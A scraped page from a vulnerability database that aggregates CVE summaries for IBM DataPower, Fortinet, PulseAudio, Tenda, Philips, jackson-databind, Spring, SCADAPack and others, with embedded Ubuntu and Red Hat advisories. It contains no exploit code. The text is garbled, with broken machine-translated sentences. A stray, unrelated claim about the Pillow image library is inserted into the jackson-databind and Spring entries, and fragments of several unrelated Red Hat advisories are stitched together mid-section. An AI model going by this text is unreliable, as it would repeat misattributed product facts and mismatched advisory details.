VARIoT IoT vulnerabilities database

IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.12 could allow a remote attacker to cause a denial of service by sending a specially crafted a JSON request with invalid characters. IBM X-Force ID: 184439. IBM DataPower Gateway There is an unspecified vulnerability in. Vendor exploits this vulnerability IBM X-Force ID: 184439 Is published as.Denial of service (DoS) It may be put into a state. IBM DataPower Gateway is a security and integration platform specially designed for mobile, cloud, application programming interface (API), network, service-oriented architecture (SOA), B2B and cloud workloads. The platform secures, integrates and optimizes access across channels with a dedicated gateway platform

An improper neutralization of script-related HTML tags in a web page in FortiManager 6.2.0, 6.2.1, 6.2.2, and 6.2.3and FortiAnalyzer 6.2.0, 6.2.1, 6.2.2, and 6.2.3 may allow an attacker to execute a cross site scripting (XSS) via the Identify Provider name field. Both Fortinet FortiManager and Fortinet FortiAnalyzer are products of Fortinet. Fortinet FortiManager is a centralized network security management platform. The platform supports centralized management of any number of Fortinet devices, and can group devices into different management domains (ADOMs) to further simplify multi-device security deployment and management. Fortinet FortiAnalyzer is a centralized network security reporting solution. This product is mainly used to collect network log data, and analyze, report, and archive the security events, network traffic, and Web content in the logs through the report suite. FortiManager and FortiAnalyzer have a cross-site scripting vulnerability, which stems from the lack of proper validation of client-side data in WEB applications. An attacker could exploit this vulnerability to execute client code

Potential double free in Bluez 5 module of PulseAudio could allow a local attacker to leak memory or crash the program. The modargs variable may be freed twice in the fail condition in src/modules/bluetooth/module-bluez5-device.c and src/modules/bluetooth/module-bluez5-device.c. Fixed in 1:8.0-0ubuntu3.14. PulseAudio There is a double release vulnerability in.Information is obtained and denial of service (DoS) It may be put into a state. ========================================================================== Ubuntu Security Notice USN-4519-1 September 17, 2020 pulseaudio vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 LTS Summary: PulseAudio could be made to crash or run programs as your login if it received specially crafted input. Software Description: - pulseaudio: PulseAudio sound server Details: Ratchanan Srirattanamet discovered that an Ubuntu-specific patch caused PulseAudio to incorrectly handle memory under certain error conditions in the Bluez 5 module. An attacker could use this issue to cause PulseAudio to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2020-15710) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: libpulse-mainloop-glib0 1:8.0-0ubuntu3.14 libpulse0 1:8.0-0ubuntu3.14 pulseaudio 1:8.0-0ubuntu3.14 pulseaudio-module-bluetooth 1:8.0-0ubuntu3.14 pulseaudio-utils 1:8.0-0ubuntu3.14 In general, a standard system update will make all the necessary changes. References: https://usn.ubuntu.com/4519-1 CVE-2020-15710 Package Information: https://launchpad.net/ubuntu/+source/pulseaudio/1:8.0-0ubuntu3.14

Tenda G1 is an enterprise-level AP management router with 100 people. The Tenda G1 router of Shenzhen Jixiang Tenda Technology Co., Ltd. has a command execution vulnerability. Attackers can use the vulnerability to execute commands remotely.

Tenda G3 is a 200-person enterprise-level AP management router with a machine, which provides an efficient, safe, and easily expandable network for small and medium-sized enterprises, restaurants, and chain hotels. Shenzhen Jixiang Tenda Technology Co., Ltd. Tenda G3 router has a command execution vulnerability. Attackers can use the vulnerability to execute commands remotely.

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior, exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. Clinical Collaboration Platform Is Philips This is a medical image information system provided by the company. Clinical Collaboration Platform Is vulnerable to several vulnerabilities: * Cross-site request forgery (CWE-352) - CVE-2020-14506 *Web Improperly invalidating scripts in page tag attributes (CWE-83) - CVE-2020-14525 * Malfunction of protection mechanism (CWE-693) - CVE-2020-16198 * Algorithm downgrade (CWE-757) - CVE-2020-16200 * Environmental setting (CWE-16) - CVE-2020-16247The expected impact depends on each vulnerability, but it may be affected as follows. * When a user who logs in to the product accesses a specially crafted page, he / she is forced to perform an unintended operation. - CVE-2020-14506 * Arbitrary script is executed by the user who logged in to the product - CVE-2020-14525 * Authentication is bypassed and unauthorized access is made by an adjacent third party - CVE-2020-16198 * Adjacent third parties cause resource exhaustion and disrupt service operations (DoS) Be in a state - CVE-2020-16200 * Unauthorized access to sensitive information by a third party - CVE-2020-16247. Attackers can use this vulnerability to gain unauthorized access to resources

Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly. Clinical Collaboration Platform Is vulnerable to several vulnerabilities: * Cross-site request forgery (CWE-352) - CVE-2020-14506 *Web Improperly invalidating scripts in page tag attributes (CWE-83) - CVE-2020-14525 * Malfunction of protection mechanism (CWE-693) - CVE-2020-16198 * Algorithm downgrade (CWE-757) - CVE-2020-16200 * Environmental setting (CWE-16) - CVE-2020-16247The expected impact depends on each vulnerability, but it may be affected as follows. * When a user who logs in to the product accesses a specially crafted page, he / she is forced to perform an unintended operation. - CVE-2020-14506 * Arbitrary script is executed by the user who logged in to the product - CVE-2020-14525 * Authentication is bypassed and unauthorized access is made by an adjacent third party - CVE-2020-16198 * Adjacent third parties cause resource exhaustion and disrupt service operations (DoS) Be in a state - CVE-2020-16200 * Unauthorized access to sensitive information by a third party - CVE-2020-16247. Attackers can use this vulnerability to conduct cross-site request forgery attacks

WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges. WebAccess Node Is Advantech Industrial software provided by. Advantech WebAccess Node is an HMI (Human Machine Interaction) platform. Advantech WebAccess Node versions before 9.0.1 have security vulnerabilities

A vulnerability in the web-based management interface of RAD SecFlow-1v through 2020-05-21 could allow an authenticated attacker to upload a JavaScript file, with a stored XSS payload, that will remain stored in the system as an OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. This payload will execute each time a user opens an affected web page. This could be exploited in conjunction with CVE-2020-13259. RAD SecFlow-1v Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. FasterXML jackson-databind There is a vulnerability in deserialization of untrusted data.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. FasterXML jackson-databind is a library based on JAVA that can convert data formats such as XML and JSON to JAVA objects. Jackson can easily convert Java objects into json objects and xml documents, as well as convert json and xml into Java objects. FasterXML jackson-databind 2.0 series prior to 2.9.10.6 has a security vulnerability, which originates from com.pastdev.httpcomponents.configuration.JndiConfiguration. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: rh-maven35-jackson-databind security update Advisory ID: RHSA-2020:4173-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2020:4173 Issue date: 2020-10-05 CVE Names: CVE-2020-24750 ==================================================================== 1. Summary: An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch 3. Description: The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Security Fix(es): * jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration (CVE-2020-24750) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: rh-maven35-jackson-databind-2.7.6-2.11.el7.src.rpm noarch: rh-maven35-jackson-databind-2.7.6-2.11.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.11.el7.noarch.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: rh-maven35-jackson-databind-2.7.6-2.11.el7.src.rpm noarch: rh-maven35-jackson-databind-2.7.6-2.11.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.11.el7.noarch.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6): Source: rh-maven35-jackson-databind-2.7.6-2.11.el7.src.rpm noarch: rh-maven35-jackson-databind-2.7.6-2.11.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.11.el7.noarch.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7): Source: rh-maven35-jackson-databind-2.7.6-2.11.el7.src.rpm noarch: rh-maven35-jackson-databind-2.7.6-2.11.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.11.el7.noarch.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: rh-maven35-jackson-databind-2.7.6-2.11.el7.src.rpm noarch: rh-maven35-jackson-databind-2.7.6-2.11.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.11.el7.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2020-24750 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBX3s4DtzjgjWX9erEAQhtzQ/+KJm3W2dfbUqCVcdtymA4f4UfDt0LFXTP T5AuDJQk5evqIQWpnV/bgbpnIhkGLFVW6AWAQK0pnT5Zl4HK33+sNOTRHKpey0PR j3C43AuFL68XeWVKX8iJdAo42s/a3K4QjEgofXiXfDipPxg356zb8lm4RiXlx9db LMgXAL0uKDzv+4HYcEmOY7A+8rDB4GwLLDmj2J6ZyahNLOECJbO7CdPVEUeT/cFN 32vYBoxmLw1CahI5RcpiebibLA2SRss84iG+/NceptBTfqQzcHVipBHzryOUNsVz PHCcgDAi0KiNR8ugj142CBcVmW6nu3WCipqxjQ86cRx3r2yu5B3yTlAMxjaBxHIC usxO7BPuiK+6Cizw0Qd/DaI0e2YkEvGJ6OwDxEB27j3id9IB9Q1n6qucZH8vahAi gJv/W+Ij1Ff1OaNVZIfXLFAnloVZAy6jBXvwzZNJWOkbHPRjbcz8JJWOt5v4AbsR DKKLs+EoxE+3GPJdTL1EAgA+rrEmbtXVHyuqamf89H5LD2yGjJF8IJkk1ei9b3FJ /hj8UXrfKYnfSM0Q/UnqQbTWXYjqhjJpkrTXTIFR2zZxnaYNOaH/lmMfBpvBEYBW K0I0Y47LoZnt2P+kaJnHWu+uuuETIkrThNZK+JH1qFzhjYfc2AGcB9r2SMAWEARI LOeqeMsgpVs=jbsa -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/): 1666415 - CVE-2018-14718 jackson-databind: arbitrary code execution in slf4j-ext class 1666418 - CVE-2018-14719 jackson-databind: arbitrary code execution in blaze-ds-opt and blaze-ds-core classes 1666423 - CVE-2018-14720 jackson-databind: exfiltration/XXE in some JDK classes 1666428 - CVE-2018-14721 jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class 1666482 - CVE-2018-19360 jackson-databind: improper polymorphic deserialization in axis2-transport-jms class 1666484 - CVE-2018-19361 jackson-databind: improper polymorphic deserialization in openjpa class 1666489 - CVE-2018-19362 jackson-databind: improper polymorphic deserialization in jboss-common-core class 1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution 1859004 - Sometimes the eventrouter couldn't gather event logs. Bug Fix(es): * Gather image registry config (backport to 4.3) (BZ#1836815) * Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist (BZ#1849176) * Login with OpenShift not working after cluster upgrade (BZ#1852429) * Limit the size of gathered federated metrics from alerts in Insights Operator (BZ#1874018) * [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs (BZ#1879110) * [release 4.3] OpenShift APIs become unavailable for more than 15 minutes after one of master nodes went down(OAuth) (BZ#1880293) You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-x86_64 The image digest is sha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-s390x The image digest is sha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64 (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le The image digest is sha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc 3. Bugs fixed (https://bugzilla.redhat.com/): 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1836815 - Gather image registry config (backport to 4.3) 1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist 1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator 1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized 1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs 5. JIRA issues fixed (https://issues.jboss.org/): LOG-1224 - Release 5.0 - ClusterLogForwarder namespace-specific log forwarding does not work as expected LOG-1232 - 5.0 - Bug 1859004 - Sometimes the eventrouter couldn't gather event logs. LOG-1234 - CVE-2020-15586 CVE-2020-16845 openshift-eventrouter: various flaws [openshift-4] LOG-1299 - Release 5.0 Forwarding logs to Kafka using Chained certificates fails with error "state=error: certificate verify failed (unable to get local issuer certificate)" 5. Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHEA-2020:5633 All OpenShift Container Platform users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor. Solution: For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/): 1823765 - nfd-workers crash under an ipv6 environment 1838802 - mysql8 connector from operatorhub does not work with metering operator 1838845 - Metering operator can't connect to postgres DB from Operator Hub 1841883 - namespace-persistentvolumeclaim-usage query returns unexpected values 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1868294 - NFD operator does not allow customisation of nfd-worker.conf 1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration 1890672 - NFD is missing a build flag to build correctly 1890741 - path to the CA trust bundle ConfigMap is broken in report operator 1897346 - NFD worker pods not scheduler on a 3 node master/worker cluster 1898373 - Metering operator failing upgrade from 4.4 to 4.6 channel 1900125 - FIPS error while generating RSA private key for CA 1906129 - OCP 4.7: Node Feature Discovery (NFD) Operator in CrashLoopBackOff when deployed from OperatorHub 1908492 - OCP 4.7: Node Feature Discovery (NFD) Operator Custom Resource Definition file in olm-catalog is not in sync with the one in manifests dir leading to failed deployment from OperatorHub 1913837 - The CI and ART 4.7 metering images are not mirrored 1914869 - OCP 4.7 NFD - Operand configuration options for NodeFeatureDiscovery are empty, no supported image for ppc64le 1916010 - olm skip range is set to the wrong range 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923998 - NFD Operator is failing to update and remains in Replacing state 5

In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. Spring Framework Contains an unspecified vulnerability.Information may be obtained and information may be tampered with. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Pivotal Software Spring Framework is a set of open source Java and JavaEE application frameworks from Pivotal Software in the United States. The framework helps developers build high-quality applications. The following products and versions are affected: 5.2.0 - 5.2.8, 5.1.0 to 5.1.17, 5.0.0 to 5.0.18, 4.3.0 to 4.3.28 and earlier unsupported versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: Red Hat Fuse 7.9.0 release and security update Advisory ID: RHSA-2021:3140-01 Product: Red Hat JBoss Fuse Advisory URL: https://access.redhat.com/errata/RHSA-2021:3140 Issue date: 2021-08-11 CVE Names: CVE-2017-5645 CVE-2017-18640 CVE-2019-12402 CVE-2019-14887 CVE-2019-16869 CVE-2019-20445 CVE-2020-1695 CVE-2020-1925 CVE-2020-1935 CVE-2020-1938 CVE-2020-5410 CVE-2020-5421 CVE-2020-6950 CVE-2020-9484 CVE-2020-10688 CVE-2020-10693 CVE-2020-10714 CVE-2020-10719 CVE-2020-11996 CVE-2020-13920 CVE-2020-13934 CVE-2020-13935 CVE-2020-13936 CVE-2020-13954 CVE-2020-13956 CVE-2020-14040 CVE-2020-14297 CVE-2020-14338 CVE-2020-14340 CVE-2020-17510 CVE-2020-17518 CVE-2020-25633 CVE-2020-25638 CVE-2020-25640 CVE-2020-25644 CVE-2020-26258 CVE-2020-26945 CVE-2020-27216 CVE-2020-28052 CVE-2021-27807 CVE-2021-27906 CVE-2021-28165 ===================================================================== 1. Summary: A minor version update (from 7.8 to 7.9) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: This release of Red Hat Fuse 7.9.0 serves as a replacement for Red Hat Fuse 7.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es): * hawtio-osgi (CVE-2017-5645) * prometheus-jmx-exporter: snakeyaml (CVE-2017-18640) * apache-commons-compress (CVE-2019-12402) * karaf-transaction-manager-narayana: netty (CVE-2019-16869, CVE-2019-20445) * tomcat (CVE-2020-1935, CVE-2020-1938, CVE-2020-9484, CVE-2020-13934, CVE-2020-13935, CVE-2020-11996) * spring-cloud-config-server (CVE-2020-5410) * velocity (CVE-2020-13936) * httpclient: apache-httpclient (CVE-2020-13956) * shiro-core: shiro (CVE-2020-17510) * hibernate-core (CVE-2020-25638) * wildfly-openssl (CVE-2020-25644) * jetty (CVE-2020-27216, CVE-2021-28165) * bouncycastle (CVE-2020-28052) * wildfly (CVE-2019-14887, CVE-2020-25640) * resteasy-jaxrs: resteasy (CVE-2020-1695) * camel-olingo4 (CVE-2020-1925) * springframework (CVE-2020-5421) * jsf-impl: Mojarra (CVE-2020-6950) * resteasy (CVE-2020-10688) * hibernate-validator (CVE-2020-10693) * wildfly-elytron (CVE-2020-10714) * undertow (CVE-2020-10719) * activemq (CVE-2020-13920) * cxf-core: cxf (CVE-2020-13954) * fuse-apicurito-operator-container: golang.org/x/text (CVE-2020-14040) * jboss-ejb-client: wildfly (CVE-2020-14297) * xercesimpl: wildfly (CVE-2020-14338) * xnio (CVE-2020-14340) * flink: apache-flink (CVE-2020-17518) * resteasy-client (CVE-2020-25633) * xstream (CVE-2020-26258) * mybatis (CVE-2020-26945) * pdfbox (CVE-2021-27807, CVE-2021-27906) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on. Installation instructions are available from the Fuse 7.9.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/ 4. Bugs fixed (https://bugzilla.redhat.com/): 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1758619 - CVE-2019-16869 netty: HTTP request smuggling by mishandled whitespace before the colon in HTTP headers 1764640 - CVE-2019-12402 apache-commons-compress: Infinite loop in name encoding algorithm 1772008 - CVE-2019-14887 wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use 1785376 - CVE-2017-18640 snakeyaml: Billion laughs attack via alias feature 1790309 - CVE-2020-1925 olingo-odata: Server side request forgery in AsyncResponseWrapperImpl 1798509 - CVE-2019-20445 netty: HttpObjectDecoder.java allows Content-Length header to accompanied by second Content-Length header 1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages 1806398 - CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability 1806835 - CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling 1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size 1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE 1845626 - CVE-2020-5410 spring-cloud-config-server: sending a request using a specially crafted URL can lead to a directory traversal attack 1851420 - CVE-2020-11996 tomcat: specially crafted sequence of HTTP/2 requests can lead to DoS 1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1857024 - CVE-2020-13935 tomcat: multiple requests with invalid payload length in a WebSocket frame could lead to DoS 1857040 - CVE-2020-13934 tomcat: OutOfMemoryException caused by HTTP/2 connection leak could lead to DoS 1860054 - CVE-2020-14338 wildfly: XML validation manipulation due to incomplete application of use-grammar-pool-only in xercesImpl 1860218 - CVE-2020-14340 xnio: file descriptor leak caused by growing amounts of NIO Selector file handles may lead to DoS 1879042 - CVE-2020-25633 resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client's WebApplicationException handling 1880101 - CVE-2020-13920 activemq: improper authentication allows MITM attack 1881158 - CVE-2020-5421 springframework: RFD protection bypass via jsessionid 1881353 - CVE-2020-25638 hibernate-core: SQL injection vulnerability when both hibernate.use_sql_comments and JPQL String literals are used 1881637 - CVE-2020-25640 wildfly: resource adapter logs plaintext JMS password at warning level on connection error 1885485 - CVE-2020-25644 wildfly-openssl: memory leak per HTTP session creation in WildFly OpenSSL 1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs 1887257 - CVE-2020-26945 mybatis: mishandles deserialization of object streams which could result in remote code execution 1891132 - CVE-2020-27216 jetty: local temporary directory hijacking vulnerability 1898235 - CVE-2020-13954 cxf: XSS via the styleSheetPath 1903727 - CVE-2020-17510 shiro: specially crafted HTTP request may cause an authentication bypass 1908832 - CVE-2020-26258 XStream: Server-Side Forgery Request vulnerability can be activated when unmarshalling 1912881 - CVE-2020-28052 bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible 1913312 - CVE-2020-17518 apache-flink: directory traversal attack allows remote file writing through the REST API 1937440 - CVE-2020-13936 velocity: arbitrary code execution when attacker is able to modify templates 1941050 - CVE-2021-27906 pdfbox: OutOfMemory-Exception while loading a crafted PDF file 1941055 - CVE-2021-27807 pdfbox: infinite loop while loading a crafted PDF file 1945714 - CVE-2021-28165 jetty: Resource exhaustion when receiving an invalid large TLS frame 5. References: https://access.redhat.com/security/cve/CVE-2017-5645 https://access.redhat.com/security/cve/CVE-2017-18640 https://access.redhat.com/security/cve/CVE-2019-12402 https://access.redhat.com/security/cve/CVE-2019-14887 https://access.redhat.com/security/cve/CVE-2019-16869 https://access.redhat.com/security/cve/CVE-2019-20445 https://access.redhat.com/security/cve/CVE-2020-1695 https://access.redhat.com/security/cve/CVE-2020-1925 https://access.redhat.com/security/cve/CVE-2020-1935 https://access.redhat.com/security/cve/CVE-2020-1938 https://access.redhat.com/security/cve/CVE-2020-5410 https://access.redhat.com/security/cve/CVE-2020-5421 https://access.redhat.com/security/cve/CVE-2020-6950 https://access.redhat.com/security/cve/CVE-2020-9484 https://access.redhat.com/security/cve/CVE-2020-10688 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10719 https://access.redhat.com/security/cve/CVE-2020-11996 https://access.redhat.com/security/cve/CVE-2020-13920 https://access.redhat.com/security/cve/CVE-2020-13934 https://access.redhat.com/security/cve/CVE-2020-13935 https://access.redhat.com/security/cve/CVE-2020-13936 https://access.redhat.com/security/cve/CVE-2020-13954 https://access.redhat.com/security/cve/CVE-2020-13956 https://access.redhat.com/security/cve/CVE-2020-14040 https://access.redhat.com/security/cve/CVE-2020-14297 https://access.redhat.com/security/cve/CVE-2020-14338 https://access.redhat.com/security/cve/CVE-2020-14340 https://access.redhat.com/security/cve/CVE-2020-17510 https://access.redhat.com/security/cve/CVE-2020-17518 https://access.redhat.com/security/cve/CVE-2020-25633 https://access.redhat.com/security/cve/CVE-2020-25638 https://access.redhat.com/security/cve/CVE-2020-25640 https://access.redhat.com/security/cve/CVE-2020-25644 https://access.redhat.com/security/cve/CVE-2020-26258 https://access.redhat.com/security/cve/CVE-2020-26945 https://access.redhat.com/security/cve/CVE-2020-27216 https://access.redhat.com/security/cve/CVE-2020-28052 https://access.redhat.com/security/cve/CVE-2021-27807 https://access.redhat.com/security/cve/CVE-2021-27906 https://access.redhat.com/security/cve/CVE-2021-28165 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.9.0 https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/ 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYRQVh9zjgjWX9erEAQjAxg/+O0wRNyDejQCX7SWv2Lvo5YZVE9Azv+hd pWFbtNu1cruoiUWY2vqArIH8KmZXWYS/EDQCe4PfIB0wKZfx9dS7y19Ct4swE4Y2 3L0DRVp9YLoqZC3ndVIk3W+RSLEODc5S3IAi6twXlmiZlAwPJXDvcs7aeUAPGc0m 93Y3lZofrpaEnyEVdoUsz0M47mQQYxNJ1nPF9FuUDsOXUqiu18JS9DsuyWwONyKw dPCxfHf3ioI+ymsYjoO+fIcu3dR6lGryvsEFY3dnXePiLlp5NBrRW359K6EQGM/e f1PsXzVYrWMikmxpGaOM7KkoLPAcvtznd4G62ZGUODyAEUKLderr9M7zG88Eg2gG Ycw5D4UkJ+QZB/qHlQJHLrrzuPybGBXSdl2VLTF/m7YZSE9C2yW1ZatyahhdEP3T +MmzU6mnbuPCrYjwL/AgCGx3ap52+2eL5HvDzf7+5plY6MVpHZQb2iiIj6H58P6g ffxr6dGJdDtw5ovzls0Gor4sb69KJ+3xrRLg2C7cndd+3RJc8SCiCRUV9QE2IHTb H3cDXlNbYcqzDxQZNUUO13+GOEgXQLrIJokA3zNXzzYFr2tivmiWF6rKrJ6UnECl 86tpZfh4vcosv3nN6Cg9VAizrMm/84B4L3T4jm/mrN4SGg3CSJqa03r7ig3+oHFX H9jzBVxbmuk= =jp7z -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

A CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Transversal') vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file. SCADAPack 7x Remote Connect Contains a path traversal vulnerability.Information may be tampered with. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions. Attackers can use this vulnerability to access locations outside of the restricted directory

A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer. SCADAPack 7x Remote Connect Is vulnerable to an untrusted data deserialization.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. SCADAPack 7x RemoteConnect is a software tool for users to monitor, configure, program and debug SCADAPack 470, 474, 570, 574, 575 intelligent RTU. SCADAPack 7x Remote Connect 3.6.3.574 and earlier versions have code issue vulnerabilities

